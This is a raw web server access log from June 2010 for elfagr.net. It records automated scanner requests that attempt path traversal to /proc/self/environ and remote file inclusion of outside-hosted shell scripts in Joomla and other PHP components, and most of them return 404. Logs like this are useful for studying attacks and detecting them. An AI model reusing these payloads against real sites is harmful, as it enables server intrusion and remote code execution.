70.38.52.2 - - [17/Jun/2010:05:32:39 -0700] "GET /logs/access_100603.log//index.php?option=com_mediqna&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.elfagr.net"
70.38.52.2 - - [17/Jun/2010:05:32:29 -0700] "GET /logs/access_100603.log/errors.php?error=http://arena.asteis.net/modules/PNphpBB2/includes/cmd.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.elfagr.net"
121.78.118.123 - - [17/Jun/2010:05:38:58 -0700] "GET /logs/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
121.78.118.123 - - [17/Jun/2010:05:38:58 -0700] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
209.200.244.57 - - [17/Jun/2010:05:50:10 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
209.200.244.57 - - [17/Jun/2010:05:50:10 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
67.228.85.91 - - [17/Jun/2010:05:50:59 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.elfagr.net"
67.228.85.91 - - [17/Jun/2010:05:51:00 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.elfagr.net"
67.228.85.91 - - [17/Jun/2010:05:51:14 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.elfagr.net"
209.200.244.57 - - [17/Jun/2010:05:54:34 -0700] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
209.200.244.57 - - [17/Jun/2010:05:54:44 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
67.228.62.66 - - [17/Jun/2010:05:56:38 -0700] "GET /logs/access.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
67.228.62.66 - - [17/Jun/2010:05:56:48 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
67.228.62.66 - - [17/Jun/2010:05:56:38 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
67.228.62.66 - - [17/Jun/2010:05:56:40 -0700] "GET /logs/access.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
67.228.62.66 - - [17/Jun/2010:05:56:50 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
67.228.62.66 - - [17/Jun/2010:05:56:50 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
67.228.62.66 - - [17/Jun/2010:05:57:09 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
67.228.85.91 - - [17/Jun/2010:05:57:00 -0700] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.elfagr.net"
67.228.85.91 - - [17/Jun/2010:05:57:00 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.elfagr.net"
67.228.85.91 - - [17/Jun/2010:05:57:03 -0700] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.elfagr.net"
67.228.85.91 - - [17/Jun/2010:05:57:03 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.elfagr.net"
67.228.62.66 - - [17/Jun/2010:05:57:13 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
67.195.111.171 - - [17/Jun/2010:05:57:19 -0700] "GET /index_files/ HTTP/1.0" 200 7672 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.elfagr.net"
209.200.244.57 - - [17/Jun/2010:05:57:33 -0700] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
209.200.244.57 - - [17/Jun/2010:05:57:33 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
67.228.85.91 - - [17/Jun/2010:05:58:23 -0700] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.elfagr.net"
67.228.85.91 - - [17/Jun/2010:05:58:13 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.elfagr.net"
209.200.244.57 - - [17/Jun/2010:05:58:33 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
209.200.244.57 - - [17/Jun/2010:05:58:46 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
209.200.244.57 - - [17/Jun/2010:05:58:38 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
67.228.62.66 - - [17/Jun/2010:05:58:41 -0700] "GET /logs/access.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
67.228.62.66 - - [17/Jun/2010:05:58:51 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
67.228.62.66 - - [17/Jun/2010:05:58:41 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
67.228.62.66 - - [17/Jun/2010:05:58:52 -0700] "GET /logs/access.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
67.228.85.91 - - [17/Jun/2010:05:58:43 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.elfagr.net"
67.228.62.66 - - [17/Jun/2010:05:58:43 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
67.228.62.66 - - [17/Jun/2010:05:58:43 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
67.228.85.91 - - [17/Jun/2010:05:58:57 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.elfagr.net"
67.195.115.166 - - [17/Jun/2010:05:59:10 -0700] "GET /SlurpConfirm404/kasvattajia/TheRules.htm HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "elfagr.net"
209.200.244.57 - - [17/Jun/2010:05:59:38 -0700] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
209.200.244.57 - - [17/Jun/2010:05:59:48 -0700] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
209.200.244.57 - - [17/Jun/2010:05:59:48 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
209.200.244.57 - - [17/Jun/2010:05:59:38 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
209.200.244.57 - - [17/Jun/2010:05:59:52 -0700] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
209.200.244.57 - - [17/Jun/2010:06:00:02 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
78.110.50.123 - - [17/Jun/2010:06:00:05 -0700] "GET /snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.rkdf.in//includes/js/x1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
78.110.50.123 - - [17/Jun/2010:05:59:55 -0700] "GET /logs/access.log%20%20//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.rkdf.in//includes/js/x1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
78.110.50.123 - - [17/Jun/2010:05:59:55 -0700] "GET /logs//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.rkdf.in//includes/js/x1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
78.110.50.123 - - [17/Jun/2010:06:00:06 -0700] "GET /logs//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.rkdf.in//includes/js/x1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
78.110.50.123 - - [17/Jun/2010:05:59:56 -0700] "GET /logs/access.log%20%20//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.rkdf.in//includes/js/x1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
78.110.50.123 - - [17/Jun/2010:05:59:56 -0700] "GET /snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.rkdf.in//includes/js/x1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
78.110.50.123 - - [17/Jun/2010:06:00:08 -0700] "GET /logs//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.rkdf.in//includes/js/x1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
78.110.50.123 - - [17/Jun/2010:05:59:58 -0700] "GET /snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.rkdf.in//includes/js/x1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
78.110.50.123 - - [17/Jun/2010:05:59:58 -0700] "GET /logs/access.log%20%20//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.rkdf.in//includes/js/x1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
67.228.85.91 - - [17/Jun/2010:06:00:03 -0700] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.elfagr.net"
67.228.85.91 - - [17/Jun/2010:06:00:03 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.elfagr.net"
67.228.85.91 - - [17/Jun/2010:06:00:14 -0700] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.elfagr.net"
67.228.85.91 - - [17/Jun/2010:06:00:14 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.elfagr.net"
78.110.50.123 - - [17/Jun/2010:06:01:14 -0700] "GET /snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.rkdf.in//includes/js/x1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
78.110.50.123 - - [17/Jun/2010:06:01:05 -0700] "GET /logs/access.log%20%20//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.rkdf.in//includes/js/x1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
78.110.50.123 - - [17/Jun/2010:06:01:05 -0700] "GET /logs//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.rkdf.in//includes/js/x1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
78.110.50.123 - - [17/Jun/2010:06:01:17 -0700] "GET /snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.rkdf.in//includes/js/x1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
78.110.50.123 - - [17/Jun/2010:06:01:17 -0700] "GET /logs//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.rkdf.in//includes/js/x1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
78.110.50.123 - - [17/Jun/2010:06:01:07 -0700] "GET /logs/access.log%20%20//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.rkdf.in//includes/js/x1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
78.110.50.123 - - [17/Jun/2010:06:01:11 -0700] "GET /logs/access.log%20%20//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.rkdf.in//includes/js/x1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
78.110.50.123 - - [17/Jun/2010:06:01:11 -0700] "GET /snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.rkdf.in//includes/js/x1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
78.110.50.123 - - [17/Jun/2010:06:01:21 -0700] "GET /logs//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.rkdf.in//includes/js/x1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
209.200.244.57 - - [17/Jun/2010:06:01:20 -0700] "GET /logs/access_100114.log//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
209.200.244.57 - - [17/Jun/2010:06:01:20 -0700] "GET /logs/access_100114.log//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
209.200.244.57 - - [17/Jun/2010:06:01:30 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
209.200.244.57 - - [17/Jun/2010:06:01:30 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
209.200.244.57 - - [17/Jun/2010:06:01:30 -0700] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
209.200.244.57 - - [17/Jun/2010:06:01:20 -0700] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
209.200.244.57 - - [17/Jun/2010:06:01:44 -0700] "GET /logs/access_100114.log//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
209.200.244.57 - - [17/Jun/2010:06:01:54 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
209.200.244.57 - - [17/Jun/2010:06:01:44 -0700] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
209.200.244.57 - - [17/Jun/2010:06:02:23 -0700] "GET /logs/access_091203.log//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
209.200.244.57 - - [17/Jun/2010:06:02:23 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
209.200.244.57 - - [17/Jun/2010:06:02:23 -0700] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
209.200.244.57 - - [17/Jun/2010:06:03:14 -0700] "GET /logs/access_091203.log//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
209.200.244.57 - - [17/Jun/2010:06:03:04 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
209.200.244.57 - - [17/Jun/2010:06:03:14 -0700] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
67.228.85.91 - - [17/Jun/2010:06:03:12 -0700] "GET /logs/access_100114.log//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.elfagr.net"
67.228.85.91 - - [17/Jun/2010:06:03:13 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.elfagr.net"
67.228.85.91 - - [17/Jun/2010:06:03:23 -0700] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.elfagr.net"
67.228.85.91 - - [17/Jun/2010:06:03:26 -0700] "GET /logs/access_100114.log//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.elfagr.net"
67.228.85.91 - - [17/Jun/2010:06:03:26 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.elfagr.net"
67.228.85.91 - - [17/Jun/2010:06:03:26 -0700] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.elfagr.net"
209.200.244.57 - - [17/Jun/2010:06:04:23 -0700] "GET /logs/access.log//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
209.200.244.57 - - [17/Jun/2010:06:04:54 -0700] "GET /logs/access.log//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
58.120.226.47 - - [17/Jun/2010:06:05:10 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.howtolisten.kr//bbs/data/yoonseok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
58.120.226.47 - - [17/Jun/2010:06:05:10 -0700] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.howtolisten.kr//bbs/data/yoonseok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
58.120.226.47 - - [17/Jun/2010:06:05:20 -0700] "GET /logs/access_091126.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.howtolisten.kr//bbs/data/yoonseok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
67.228.85.91 - - [17/Jun/2010:06:08:45 -0700] "GET /logs/access_091203.log//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.elfagr.net"
67.228.85.91 - - [17/Jun/2010:06:08:45 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.elfagr.net"
67.228.85.91 - - [17/Jun/2010:06:08:45 -0700] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.elfagr.net"
58.120.226.47 - - [17/Jun/2010:06:09:58 -0700] "GET /logs/access_100401.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.howtolisten.kr//bbs/data/yoonseok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
88.214.206.81 - - [17/Jun/2010:06:10:35 -0700] "GET / HTTP/1.1" 200 1465 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3" "elfagr.net"
88.214.206.81 - - [17/Jun/2010:06:10:35 -0700] "GET /?S=A HTTP/1.1" 200 1465 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3" "elfagr.net"
88.214.206.81 - - [17/Jun/2010:06:10:35 -0700] "GET /?N=D HTTP/1.1" 200 1465 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3" "elfagr.net"
67.228.85.91 - - [17/Jun/2010:06:11:56 -0700] "GET /logs/access.log//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.elfagr.net"
62.44.82.61 - - [17/Jun/2010:06:12:22 -0700] "GET /logs/access.log/*.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "elfagr.net"
62.44.82.61 - - [17/Jun/2010:06:12:23 -0700] "GET /*.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "elfagr.net"
62.44.82.61 - - [17/Jun/2010:06:12:23 -0700] "GET /logs/*.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "elfagr.net"
67.228.85.91 - - [17/Jun/2010:06:12:34 -0700] "GET /logs/access_091203.log//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.elfagr.net"
67.228.85.91 - - [17/Jun/2010:06:12:44 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.elfagr.net"
67.228.85.91 - - [17/Jun/2010:06:12:34 -0700] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.elfagr.net"
